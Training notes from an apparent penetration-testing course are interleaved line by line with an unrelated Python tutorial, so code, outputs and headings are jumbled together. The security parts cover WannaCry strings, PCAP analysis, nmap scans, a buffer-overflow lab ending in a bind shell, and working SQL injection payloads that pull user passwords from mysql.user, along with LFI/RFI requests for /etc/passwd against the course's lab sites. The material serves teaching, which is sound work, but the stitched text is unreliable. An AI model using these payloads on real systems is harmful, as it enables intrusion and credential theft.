 
 
import re

result=re.findall(r'@\w+.\w+','abc.test@gmail.com, xyz@test.com, test.first@strategicsec.com, first.test@rest.biz')

print (result)

 
 
Ok, let's look for the individual strings
Output:

['@gmail.com', '@test.com', '@strategicsec.com', '@rest.biz']

 
 
strings wannacry.exe | grep -i ooops
 
strings wannacry.exe | grep -i wanna
 
Solution – 2 Extract only domain name using "( )"

-----------------------------------------------------------------------------------------------------------------------

strings wannacry.exe | grep -i wannacry
 
Code

 
 
import re

result=re.findall(r'@\w+.(\w+)','abc.test@gmail.com, xyz@test.com, test.first@strategicsec.com, first.test@rest.biz')

print (result)

 
 
 
Output:

['com', 'com', 'com', 'biz']

####################################
Decided to make my own script for this kind of stuff in the future. I
 
********************************************

* Problem 4: Return date from given string *

********************************************

This is a really good script for the basics of static analysis
 
Here we will use "\d" to extract digit.

https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
 
Solution:

----------------------------------------------------------------------------------------------------------------------

 
Code

Here is my own script using the signatures (started this yesterday, but still needs work):
https://pastebin.com/guxzCBmP
import re

 
result=re.findall(r'\d{2}-\d{2}-\d{4}','Joe 34-3456 12-05-2007, XYZ 56-4532 11-11-2016, ABC 67-8945 12-01-2009')

print (result)

 
sudo apt install -y python-pefile
     infosecaddicts
Output:

['12-05-2007', '11-11-2016', '12-01-2009']

 
If you want to extract only year again parenthesis "( )" will help you.

 
 
Code

 
 
vi am.py
import re

result=re.findall(r'\d{2}-\d{2}-(\d{4})','Joe 34-3456 12-05-2007, XYZ 56-4532 11-11-2016, ABC 67-8945 12-01-2009')

print (result)

 
-----------------------------------------------------------------------

Output:

['2007', '2016', '2009']

 
 
 
 
 
*******************************************************************

* Problem 5: Return all words of a string those starts with vowel *

*******************************************************************

---------------------------Type This-----------------------------------

-----------------------------------------------------------------------
 
Solution-1  Return each words

-----------------------------------------------------------------------------------------------------------------

McAfee is giving these yara rules - so add them to the hashes.txt file
Code

Reference:
https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
import re

result=re.findall(r'\w+','Python is the best')

print (result)

{
    meta:
Output:

['Python', 'is', 'the', 'best']

        weight = 100
        date = "2017-05-12"
 
    strings:
        $s1 = "Ooops, your files have been encrypted!" wide ascii nocase
Solution-2  Return words starts with alphabets (using [])

------------------------------------------------------------------------------------------------------------------

        $s4 = "WANNACRY" wide ascii nocase
Code

        $s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase
 
import re

result=re.findall(r'[aeiouAEIOU]\w+','I love Python')

print (result)

 
----------------------------------------------------------------------------
rule wannacry_2{
Output:

['ove', 'on']

        description = "WannaCry Ransomware Strings"
Above you can see that it has returned "ove" and "on" from the mid of words. To drop these two, we need to use "\b" for word boundary.

        weight = 100
 
    strings:
        $string1 = "msg/m_bulgarian.wnry"
        $string2 = "msg/m_chinese (simplified).wnry"
Solution- 3

------------------------------------------------------------------------------------------------------------------

        $string5 = "msg/m_czech.wnry"
Code

        $string7 = "msg/m_dutch.wnry"
        $string8 = "msg/m_english.wnry"
import re

result=re.findall(r'\b[aeiouAEIOU]\w+','I love Python')

print (result)

        $string12 = "msg/m_german.wnry"
        $string13 = "msg/m_greek.wnry"
        $string14 = "msg/m_indonesian.wnry"
Output:

[]

        $string17 = "msg/m_korean.wnry"
In similar ways, we can extract words those starts with constant using "^" within square bracket.

        $string19 = "msg/m_norwegian.wnry"
        $string20 = "msg/m_polish.wnry"
Code

        $string22 = "msg/m_romanian.wnry"
        $string23 = "msg/m_russian.wnry"
import re

result=re.findall(r'\b[^aeiouAEIOU]\w+','I love Python')

print (result)

        $string27 = "msg/m_turkish.wnry"
        $string28 = "msg/m_vietnamese.wnry"
 
Output:

[' love', ' Python']

        any of ($string*)
Above you can see that it has returned words starting with space. To drop it from output, include space in square bracket[].

----------------------------------------------------------------------------
 
Code



import re

result=re.findall(r'\b[^aeiouAEIOU ]\w+','I love Python')
# Intro to Threat Hunting #
print (result)




Output:

['love', 'Python']

##################################################################
# Analyzing a PCAP Prads                                         #
# Note: run as regular user                                      #
##################################################################
 
---------------------------Type this as a regular user----------------------------------
*************************************************************************************************
cd ~/yourname
* Problem 6: Validate a phone number (phone number must be of 10 digits and starts with 8 or 9) *

*************************************************************************************************
mkdir pcap_analysis/

cd pcap_analysis/
We have a list phone numbers in list "li" and here we will validate phone numbers using regular

mkdir prads
 
cd prads
 
Solution
wget http://45.63.104.73/suspicious-time.pcap
-------------------------------------------------------------------------------------------------------------------------------------

prads -r suspicious-time.pcap -l prads-asset.log
 
Code
cat prads-asset.log | less
 
cat prads-asset.log | grep SYN | grep -iE 'windows|linux'
import re

li=['9999999999','999999-999','99999x9999']
cat prads-asset.log | grep CLIENT | grep -iE 'safari|firefox|opera|chrome'
for val in li:

    if re.match(r'[8-9]{1}[0-9]{9}',val) and len(val) == 10:
cat prads-asset.log | grep SERVER | grep -iE 'apache|linux|ubuntu|nginx|iis'
        print ('yes')

 
        print ('no')

 
 
##################################
# PCAP Analysis with ChaosReader #
Output:
# Note: run as regular user      #
yes

no
---------------------------Type this as a regular user----------------------------------
no
cd ~/yourname


cd pcap_analysis/
 
mkdir chaos_reader/
******************************************************

* Problem 7: Split a string with multiple delimiters *
cd chaos_reader/
******************************************************

wget http://45.63.104.73/suspicious-time.pcap
 
wget http://45.63.104.73/chaosreader.pl
Solution

---------------------------------------------------------------------------------------------------------------------------
perl chaosreader.pl suspicious-time.pcap
 
cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
Code

cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
 
import re

line = 'asdf fjdk;afed,fjek,asdf,foo' # String has multiple delimiters (";",","," ").
for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' |  cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' |  cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host";  done | sort -u
result= re.split(r'[;,\s]', line)

print (result)
python -m SimpleHTTPServer    
          ****** Open a web browser and browse the the IP address of your Linux machine port 8000 for the web page *****
 
------------------------------------------------------------------------
Output:

['asdf', 'fjdk', 'afed', 'fjek', 'asdf', 'foo']

 
 
 
We can also use method re.sub() to replace these multiple delimiters with one as space " ".

 
 
Code

# PCAP Analysis with tshark #
# Note: run as regular user #
import re

line = 'asdf fjdk;afed,fjek,asdf,foo'
---------------------------Type this as a regular user---------------------------------
result= re.sub(r'[;,\s]',' ', line)
cd ~/yourname
print (result)

mkdir pcap_analysis/

cd pcap_analysis/
Output:

asdf fjdk afed fjek asdf foo
mkdir tshark
 
cd tshark
 
wget http://45.63.104.73/suspicious-time.pcap
**************************************************

* Problem 8: Retrieve Information from HTML file *
tshark -i ens3 -r suspicious-time.pcap -qz io,phs
**************************************************

tshark -r suspicious-time.pcap -qz ip_hosts,tree
 
tshark -r suspicious-time.pcap -Y "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
I want to extract information from a HTML file (see below sample data). Here we need to extract information available between <td> and </td> except the first numerical index. I have assumed here that below html code is stored in a string str.

tshark -r suspicious-time.pcap -Y "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
 
 
Create a file (file.txt) that contains the following data:
tshark -r suspicious-time.pcap -Y http.request  -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
 
whois rapidshare.com.eyu32.ru
<tr align="center"><td>1</td> <td>Noah</td> <td>Emma</td></tr>

<tr align="center"><td>2</td> <td>Liam</td> <td>Olivia</td></tr>
whois sploitme.com.cn
<tr align="center"><td>3</td> <td>Mason</td> <td>Sophia</td></tr>

<tr align="center"><td>4</td> <td>Jacob</td> <td>Isabella</td></tr>
tshark -r suspicious-time.pcap -Y http.request  -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
<tr align="center"><td>5</td> <td>William</td> <td>Ava</td></tr>

<tr align="center"><td>6</td> <td>Ethan</td> <td>Mia</td></tr>
tshark -r suspicious-time.pcap -qz http_req,tree
<tr align="center"><td>7</td> <td HTML>Michael</td> <td>Emily</td></tr>

tshark -r suspicious-time.pcap -Y "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
 
Solution:
tshark -r suspicious-time.pcap -Y http.request  -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico'  | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
------------------------------------------------------------------------


Code



f=open('file.txt', "r")

import re
----------- ############### # Day 3: Software Exploitation  # ############### -----------
str = f.read()

result=re.findall(r'<td>\w+</td>\s<td>(\w+)</td>\s<td>(\w+)</td>',str)

print (result)

# Scanning Methodology #
########################
Output:

[('Noah', 'Emma'), ('Liam', 'Olivia'), ('Mason', 'Sophia'), ('Jacob', 'Isabella'), ('William', 'Ava'), ('Ethan', 'Mia'), ('Michael', 'Emily')]
- Ping Sweep
What's alive?
------------
 
You can read html file using library urllib (see below code).
---------------------------Type this command-----------------------------------
sudo nmap -sP 157.166.226.*
-------------------------------------------------------------------------------
Code

 
 
from urllib.request import urlopen
    -if -SP yields no results try:
html = urlopen("http://www.google.com/")
---------------------------Type this command-----------------------------------
print(html.read())
sudo nmap -sL 157.166.226.*
-------------------------------------------------------------------------------
NOTE: You can put any website URL that you want in the urllib2.urlopen('')

 
 
    -Look for hostnames:
---------------------------Type this command-----------------------------------
sudo nmap -sL 157.166.226.* | grep cnn
#############

# Functions #

#############

 
- Port Scan
***********************
What's where?
* What are Functions? *
------------
***********************
---------------------------Type this command-----------------------------------
sudo nmap -sS 162.243.126.247
-------------------------------------------------------------------------------
Functions are a convenient way to divide your code into useful blocks, allowing us to order our code, make it more readable, reuse it and save some time. Also functions are a key way to define interfaces so programmers can share their code.

 
How do you write functions in Python?

- Bannergrab/Version Query
Python makes use of blocks.
What versions of software are running
-------------------------------------
A block is a area of code of written in the format of:

---------------------------Type this command-----------------------------------
block_head:
sudo nmap -sV 162.243.126.247
-------------------------------------------------------------------------------
     1st block line

 
     2nd block line

 
     ...
- Vulnerability Research
Lookup the banner versions for public exploits
----------------------------------------------
Where a block line is more Python code (even another block), and the block head is of the following format: block_keyword block_name(argument1,argument2, ...) Block keywords you already know are "if", "for", and "while".
https://www.exploit-db.com/search
http://securityfocus.com/bid
Functions in python are defined using the block keyword "def", followed with the function's name as the block's name. For example:
https://packetstormsecurity.com/files/tags/exploit/
 
def my_function():

   print("Hello From My Function!")

Network Penetration Testing Process (known vulnerabilities)
-----------------------------------------------------------
Functions may also receive arguments (variables passed from the caller to the function). For example:

 
def my_function_with_args(username, greeting):
1. Ping Sweep:
   print("Hello, %s , From My Function!, I wish you %s"%(username, greeting))
The purpose of this step is to identify live hosts
 
    nmap -sP <ip-address/ip-range>
Functions may return a value to the caller, using the keyword- 'return' . For example:

 
def sum_two_numbers(a, b):
2. Port Scan
   return a + b
Identify running services. We use the running services to map the network topology.
 
    nmap -sS <ip-address/ip-range>
****************************************

* How do you call functions in Python? *

****************************************
3. Bannergrab
Identify the version of version of software running on each port
Simply write the function's name followed by (), placing any required arguments within the brackets. For example, lets call the functions written above (in the previous example):

    nmap -sV <ip-address/ip-range>
# Define our 3 functions

 
def my_function():

   print("Hello From My Function!")
4. Vulnerability Research
Use the software version number to research and determine if it is out of date (vulnerable).
 
    exploit-db.com/search
 
def my_function_with_args(username, greeting):

   print("Hello, %s , From My Function!, I wish you %s"%(username, greeting))

 
 
 
 
def sum_two_numbers(a, b):

   return a + b

Skill Level 1. Run the scanners
-------------------------------
    Nexpose
Let's print(a simple greeting)
    Qualys
    Retina
    Nessus              known vulnerabilities
my_function()
    OpenVas
    Foundscan
    GFI LanGuard
    NCircle
Prints - "Hello, Joe, From My Function!, I wish you a great year!"

 
my_function_with_args("Joe", "a great year!")
Skill Level 2. Manual vulnerability validation (known vulnerabilities)
-----------------------------------------------------------------------
 
    windows ->  systeminfo
After this line x will hold the value 3!
    Linux->     dpkg -l
                rpm -qa
x = sum_two_numbers(1,2)

x

 
 
 
 
 
##########################

# Python Lambda Function #
# Quick Stack Based Buffer Overflow #
##########################

 
- You can download everything you need for this exercise from the links below (copy nc.exe into the c:\windows\system32 directory)
Python allows you to create anonymous function i.e function having no names using a facility called lambda function.
http://45.63.104.73/ExploitLab.zip
 
lambda functions are small functions usually not more than a line. It can have any number of arguments just like a normal function. The body of lambda functions is very small and consists of only one expression. The result of the expression is the value when the lambda is applied to an argument. Also there is no need for any return statement in lambda function.

- Extract the ExploitLab.zip file to your Desktop
Let’s take an example:

- Go to folder C:\Users\student\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
Consider a function multiply()

- Open a new command prompt and type:
def multiply(x, y):

   return x * y

nc localhost 9999
--------------------------------------------------------------------------
This function is too small, so let’s convert it into a lambda function.

- In the new command prompt window where you ran nc type:
To create a lambda function first write keyword lambda followed by one of more arguments separated by comma, followed by colon sign ( : ), followed by a single line expression.
HELP
 
- Go to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts
- Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
>>> r = lambda x, y: x * y

>>> r(12,3)
- Now double-click on 1-simplefuzzer.py
36
- You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
 
 
Here we are using two arguments x  and y , expression after colon is the body of the lambda function. As you can see lambda function has no name and is called through the variable it is assigned to.
- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
 
You don’t need to assign lambda function to a variable.
- Now go to folder C:\Users\student\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
 
- Go back to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
 
>>> (lambda x, y: x * y)(3,4)
- Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
12

- Now isolate the crash by restarting your debugger and running script 2-3000chars.py
 
Note that lambda function can’t contain more than one expression.
- Calculate the distance to EIP by running script 3-3000chars.py
- This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
 
4-count-chars-to-EIP.py
##################
- In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
# Python Classes #
- so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
##################

5-2006char-eip-check.py
- In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
****************

* Introduction *
6-jmp-esp.py
****************
- In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
 
Classes are the cornerstone of Object Oriented Programming. They are the blueprints used to create objects. And, as the name suggests, all of Object Oriented Programming centers around the use of objects to build programs.
7-first-exploit
- In this script we actually do the stack overflow and launch a bind shell on port 4444
You don't write objects, not really. They are created, or instantiated, in a program using a class as their basis. So, you design objects by writing classes. That means that the most important part of understanding Object Oriented Programming is understanding what classes are and how they work.

8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
 
***********************

* Real World Examples *

***********************

 
 
This next part if going to get abstract. You can think of objects in programming just like objects in the real world. Classes are then the way you would describe those objects and the plans for what they can do.
Skill Level 3. Identify unknown vulnerabilities
-----------------------------------------------
Start off by thinking about a web vuln scanner.

- App Type
What about what they can do? Nearly every web vuln scanner can do the same basic things, but they just might do them differently or at different speeds. You could then describe the actions that a vuln scanner can perform using functions. In Object Oriented Programming, though, functions are called methods.
------------
    Stand Alone             Client Server               Web App
So, if you were looking to use "vuln scanner" objects in your program, you would create a "vuln scanner" class to serve as a blueprint with all of the variables that you would want to hold information about your "vuln scanner" objects and all of the methods to describe what you would like your vuln scanner to be able to do.

                        ***(vulnerserver.exe)***
 
******************

* A Python Class *
- Input TYpe
******************
-------------
    FIle                    logical network port            Browser
    Keyboard
Now that you have a general idea of what a class is, it's best to take a look at a real Python class and study how it is structured.
    Mouse
 
 
 
class WebVulnScanner(object):
                        ***(9999)***
   make = 'Acunetix'

   model = '10.5'

   year = '2014'
- Map & Fuzz app entry points:
   version ='Consultant Edition'

    - Commands              ***(commands)***
   profile = 'High Risk'
    - Methods
    - Verbs
    - functions
   def crawling(self, speed):
    - subroutines
       print("Crawling at %s" % speed)
    - controllers
 
 
   def scanning(self, speed):
- Isolate the crash
       print("Scanning at %s" % speed)
-------------------
App seems to reliably crash at TRUN 2100
 
 
Creating a class looks a lot like creating a function. Instead of def you use the keyword, class. Then, you give it a name, just like you would a function. It also has parenthesis like a function, but they don't work the way you think. For a class the parenthesis allow it to extend an existing class. Don't worry about this right now, just understand that you have to put object there because it's the base of all other classes.
- Calculate the distance to EIP
-------------------------------
From there, you can see a bunch of familiar things that you'd see floating around any Python program, variables and functions. There are a series of variables with information about the scanner and a couple of methods(functions) describing what the scanner can do. You can see that each of the methods takes two parameters, self and speed. You can see that "speed" is used in the methods to print out how fast the scanner is scanning, but "self" is different.
Distance to EIP is 2006
 
We found that EIP was populated with the value: 396F4338
*****************
396F4338 is 8 (38), C (43), o (6F), 9 (39) so we search for 8Co9 in the non_repeating pattern
* What is Self? *

*****************
An online tool that we can use for this is:
https://zerosum0x0.blogspot.com/2016/11/overflow-exploit-pattern-generator.html
Alright, so "self" is the biggest quirk in the way that Python handles Object Oriented Programming. In most languages, classes and objects are just aware of their variables in their methods. Python needs to be told to remember them. When you pass "self" to a method, you are essentially passing that object to its method to remind it of all of the variables and other methods in that object. You also need to use it when using variables in methods. For example, if you wanted to output the model of the scanner along with the speed, it looks like this.

################# Do not do this lab #################

 
- Redirect Program Execution
print("Your %s is crawling at %s" % (self.model, speed))

A 3rd party dll named essfunc.dll seems to be the best candidate for the 'JMP ESP' instruction.
################# end of lab that doesn't work #################
We learned that we control EAX and ESP in script 2.
 
It's awkward and odd, but it works, and it's really not worth worrying about. Just remember to include "self" as the first parameter of your methods and "self." in front of your variables, and you'll be alright.

 
 
*****************

* Using A Class *
- Implement Shellcode
*****************

There are only 2 things that can go wrong with shellcode:
- Not enough space
You're ready to start using the WebVulnScanner class. Create a new Python file and paste the class in. Below, you can create an object using it. Creating, or instantiating, an object in Python looks like the line below.
- Bad characters
 
 
myscanner = WebVulnScanner()

 
 
 
That's it. To create a new object, you just have to make a new variable and set it equal to class that you are basing your object on.

# FreeFloat FTP Server Exploit Analysis #
Get your scanner object to print out its make and model.

 
 
print("%s %s" % (myscanner.make, myscanner.model))

Analyze the following exploit code:
https://www.exploit-db.com/exploits/15689/
The use of a . between an object and its internal components is called the dot notation. It's very common in OOP. It works for methods the same way it does for variables.

1. What is the target platform that this exploit works against?
2. What is the variable name for the distance to EIP?
myscanner.scanning('10req/sec')
3. What is the actual distance to EIP in bytes?
4. Describe what is happening in the variable ‘junk2’
 
What if you want to change the profile of your scanning? You can definitely do that too, and it works just like changing the value of any other variable. Try printing out the profile of your scanner first. Then, change the profile, and print it out again.

 
 
print("The profile of my scanner settings is %s" % myscanner.profile)
Analysis of the training walk-through based on EID: 15689:
myscanner.profile = "default"
http://45.63.104.73/ff.zip
print("The profile of my scanner settings is %s" % myscanner.profile)

 
 
Your scanner settings are default now. What about a new WebVulnScanner? If you made a new scanner object, would the scanning profile be default? Give it a shot.

ff1.py
1. What does the sys module do?
mynewscanner = WebVulnScanner()
2. What is sys.argv[1] and sys.argv[2]?
print("The scanning profile of my new scanner is %s" % mynewscanner.profile)
3. What application entry point is being attacked in this script?
 
 
That one's high risk. New objects are copied from the class, and the class still says that the profile is high risk. Objects exist in the computer's memory while a program is running. When you change the values within an object, they are specific to that object as it exists in memory. The changes won't persist once the program stops and won't change the class that it was created from.

ff2.py
1. Explain what is happening in lines 18 - 20 doing.
2. What is pattern_create.rb doing and where can I find it?
# The self variable in python explained #
3. Why can’t I just double click the file to run this script?
 
 
So lets start by making a class involving the self variable.

ff3.py
A simple class :
1. Explain what is happening in lines 17 - to 25?
2. Explain what is happening in lines 30 - to 32?
So here is our class:
3. Why is everything below line 35 commented out?
 
 
class port(object):

   open = False
ff4.py
   def open_port(self):
1. Explain what is happening in lines 13 to 15.
       if not self.open:
2. Explain what is happening in line 19.
           print("port open")
3. What is the total length of buff?
 
 
 
First let me explain the above code without the technicalities. First of all we make a class port. Then we assign it a property “open” which is currently false. After that we assign it a function open_port which can only occur if “open” is False which means that the port is open.
ff5.py
1. Explain what is happening in line 15.
Making a Port:
2. What is struct.pack?
3. How big is the shellcode in this script?
Now that we have made a class for a Port, lets actually make a port:

 
 
x = port()
ff6.py
1. What is the distance to EIP?
2. How big is the shellcode in this script?
Now x is a port which has a property open and a function open_port. Now we can access the property open by typing:
3. What is the total byte length of the data being sent to this app?
 
 
x.open

 
ff7.py
The above command is same as:
1. What is a tuple in python?
2. How big is the shellcode in this script?
3. Did your app crash in from this script?
port().open

 
 
Now you can see that self refers to the bound variable or object. In the first case it was x because we had assigned the port class to x whereas in the second case it referred to port(). Now if we have another port y, self will know to access the open value of y and not x. For example check this example:

ff8.py
1. How big is the shellcode in this script?
>>> x = port()
2. What is try/except in python?
>>> x.open
3. What is socket.SOCK_STREAM in Python?
False

>>> y = port()

>>> y.open = True

>>> y.open
ff9.py
True
1. What is going on in lines 19 and 20?
>>> x.open
2. What is the length of the NOPs?
False
3. From what DLL did the address of the JMP ESP come from?
 
 
The first argument of every class method, including init, is always a reference to the current instance of the class. By convention, this argument is always named self. In the init method, self refers to the newly created object; in other class methods, it refers to the instance whose method was called. For example the below code is the same as the above code.

 
ff010.py
1. What is going on in lines 18 - 20?
class port(object):
2. What is going on in lines 29 - 32?
   open = False
3. How would a stack adjustment help this script? 
   def open_port(this):

       if not this.open:

           print("port open")


                           ##########################
----------- ############### # Day 4: Web App Testing ############### -----------
                           ##########################
 
 
 
##################################
                            ###############################################################

----------- ############### # Day 3: Web App Pentesting, PW Cracking and more with Python # ############### -----------

                            ###############################################################

Most people are going to tell you reference the OWASP Testing guide.
https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
 
I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.
 
 
The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.
################################################

# Python Penetration Testing—Application Layer #
   1. Does the website talk to a DB?
################################################
       - Look for parameter passing (ex: site.com/page.php?id=4)
       - If yes - try SQL Injection
 
   2. Can I or someone else see what I type?
       - If yes - try XSS
 
   3. Does the page reference a file?
       - If yes - try LFI/RFI
 
Let's start with some manual testing against 45.63.104.73
 
 
#######################
# Attacking PHP/MySQL #
#######################
 
Go to LAMP Target homepage
https://phpapp.infosecaddicts.com/
 
 
 
Clicking on the Acer Link:
https://phpapp.infosecaddicts.com/acre2.php?lap=acer
 
   - Found parameter passing (answer yes to question 1)
   req = requests.request(method, 'Enter the URL’)
   - Insert ' to test for SQLI
 
---------------------------Type This-----------------------------------
 
https://phpapp.infosecaddicts.com/acre2.php?lap=acer'
 
-----------------------------------------------------------------------
 
Page returns the following error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''acer''' at line 1
 
 
 
In order to perform union-based sql injection - we must first determine the number of columns in this query.
We do this using the ORDER BY
 
---------------------------Type This-----------------------------------
 
https://phpapp.infosecaddicts.com/acre2.php?lap=acer' order by 100-- +
-----------------------------------------------------------------------
 
Page returns the following error:
Unknown column '100' in 'order clause'
 
 
---------------------------Type This-----------------------------------
 
https://phpapp.infosecaddicts.com/acre2.php?lap=acer' order by 50-- +
-----------------------------------------------------------------------
 
After running the above script for a particular web server, we will get 200 OK responses for a particular methodaccepted by the web server. We will get a 403 Forbidden response if the web server explicitly denies the method. Once we send the TRACE method for testing cross  site  tracing  (XST), we  will  get 405  Not  Allowed responses  from  the  web  server otherwise we will get the message ‘Cross Site Tracing(XST) is possible’.

Unknown column '50' in 'order clause'
 
 
---------------------------Type This-----------------------------------
 
https://phpapp.infosecaddicts.com/acre2.php?lap=acer' order by 25-- +
-----------------------------------------------------------------------
 
Page returns the following error:
Unknown column '25' in 'order clause'
 
 
---------------------------Type This-----------------------------------
 
https://phpapp.infosecaddicts.com/acre2.php?lap=acer' order by 12-- +
-----------------------------------------------------------------------
 
Page returns the following error:
Unknown column '12' in 'order clause'
 
 
---------------------------Type This-----------------------------------
 
https://phpapp.infosecaddicts.com/acre2.php?lap=acer' order by 6-- +
-----------------------------------------------------------------------
 
---Valid page returned for 5 and 6...error on 7 so we know there are 6 columns
 
 
 
Now we build out the union all select statement with the correct number of columns
 
Reference:
http://www.techonthenet.com/sql/union.php
 
 
---------------------------Type This-----------------------------------
 
https://phpapp.infosecaddicts.com/acre2.php?lap=acer' union all select 1,2,3,4,5,6-- +
-----------------------------------------------------------------------
 
 
 
Now we negate the parameter value 'acer' by turning into the word 'null':
---------------------------Type This-----------------------------------
 
https://phpapp.infosecaddicts.com/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j
-----------------------------------------------------------------------
 
We see that a 4 and a 5 are on the screen. These are the columns that will echo back data
 
 
Use a cheat sheet for syntax:
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
 
---------------------------Type This-----------------------------------
 
https://phpapp.infosecaddicts.com/acre2.php?lap=null' union all select 1,2,3,user(),5,6-- j
 
https://phpapp.infosecaddicts.com/acre2.php?lap=null' union all select 1,2,3,user(),version(),6-- j
 
https://phpapp.infosecaddicts.com/acre2.php?lap=null' union all select 1,2,3,user(),@@version,6-- +
 
https://phpapp.infosecaddicts.com/acre2.php?lap=null' union all select 1,2,3,user(),@@datadir,6-- +
 
 
https://phpapp.infosecaddicts.com/acre2.php?lap=null' union all select 1,2,3,user,password,6 from mysql.user -- a
 
-----------------------------------------------------------------------
 
 
 
########################
# Question I get a lot #
########################
Sometimes students ask about the "-- j" or "-- +" that I append to SQL injection attack string.
 
Here is a good reference for it:
https://www.symantec.com/connect/blogs/mysql-injection-comments-comments
 
Both attackers and penetration testers alike often forget that MySQL comments deviate from the standard ANSI SQL specification. The double-dash comment syntax was first supported in MySQL 3.23.3. However, in MySQL a double-dash comment "requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on)." This double-dash comment syntax deviation is intended to prevent complications that might arise from the subtraction of negative numbers within SQL queries. Therefore, the classic SQL injection exploit string will not work against backend MySQL databases because the double-dash will be immediately followed by a terminating single quote appended by the web application. However, in most cases a trailing space needs to be appended to the classic SQL exploit string. For the sake of clarity we'll append a trailing space and either a "+" or a letter.
 
 
 
 
#########################
# File Handling Attacks #
#########################
 
Here we see parameter passing, but this one is actually a yes to question number 3 (reference a file)
 
---------------------------Type This-----------------------------------
 
https://phpapp.infosecaddicts.com/showfile.php?filename=about.txt
 
-----------------------------------------------------------------------
 
#!/usr/bin/eve python3

See if you can read files on the file system:
---------------------------Type This-----------------------------------
 
https://phpapp.infosecaddicts.com/showfile.php?filename=/etc/passwd
-----------------------------------------------------------------------
 
We call this attack a Local File Include or LFI.
 
Now let's find some text out on the internet somewhere:
https://www.gnu.org/software/hello/manual/hello.txt
 
 
Now let's append that URL to our LFI and instead of it being Local - it is now a Remote File Include or RFI:
 
---------------------------Type This-----------------------------------
 
https://phpapp.infosecaddicts.com/showfile.php?filename=https://www.gnu.org/software/hello/manual/hello.txt
-----------------------------------------------------------------------
 
#########################################################################################
# SQL Injection                                                                         #
# https://phpapp.infosecaddicts.com/1-Intro_To_SQL_Intection.pptx #
#########################################################################################
 
 
- Another quick way to test for SQLI is to remove the paramter value
 
 
#############################
# Error-Based SQL Injection #
#############################
---------------------------Type This-----------------------------------
 
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
# Footprinting of a Web Application #
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))--     NOTE: "N" - just means to keep going until you run out of databases
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
Methods for Footprinting of a Web Application
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
 
Gathering information using parser BeautifulSoup

 
 
Suppose we want to collect all the hyperlinks from  a  web page; we can make use of a parser called BeautifulSoup.The parser is a Python library for pulling data out of HTML and XML files. It can be used with urlib because it needs an input (document or url) to create a soup object and it can’t fetch web page by itself.

#############################
To  begin  with,  let  us import  the  necessary  packages. We  will  import urlib and BeautifulSoup. Remember before importing BeautifulSoup, we need to install it.

#############################
 
apt-get install python3-bs4             <-- This is already installed. You don't have to do this step

 
